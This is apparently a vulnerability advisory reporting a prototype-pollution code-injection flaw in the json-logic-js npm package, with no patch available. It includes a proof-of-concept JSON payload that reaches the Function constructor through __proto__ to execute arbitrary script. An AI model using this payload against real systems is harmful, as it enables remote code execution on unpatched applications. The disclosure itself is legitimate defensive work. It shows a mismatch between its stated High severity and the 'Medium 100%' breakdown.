SB2020091429 - Code Injection in json-logic-js package for NPM



SB2020091429 - Code Injection in json-logic-js package for NPM

Published: September 14, 2020 Updated: September 16, 2020

Security Bulletin ID SB2020091429
Severity
High
Patch available
NO
Number of vulnerabilities 1
Exploitation vector Remote access
Highest impact Code execution

Breakdown by Severity

Medium 100%
  • Low
  • Medium
  • High
  • Critical

Description

This security bulletin contains information about 1 security vulnerability.


1) Prototype pollution (CVE-ID: N/A)

The disclosed vulnerability allows a remote attacker to perform code inection attacks.

The vulnerability exists due to insufficient sanitization of user-supplied data. A remote attacker can inject and execute arbitrary script code.

Example:

{
  "method": [
    {
      "method": [
        {
          "var": "__proto__.constructor.is."
        },
        "constructor",
        [
          "var x = 'SECURITY!'; console.log(x, window.fetch); alert(x)"
        ]
      ]
    },
    "call"
  ]
}


Remediation

Cybersecurity Help is not aware of any official remediation provided by the vendor.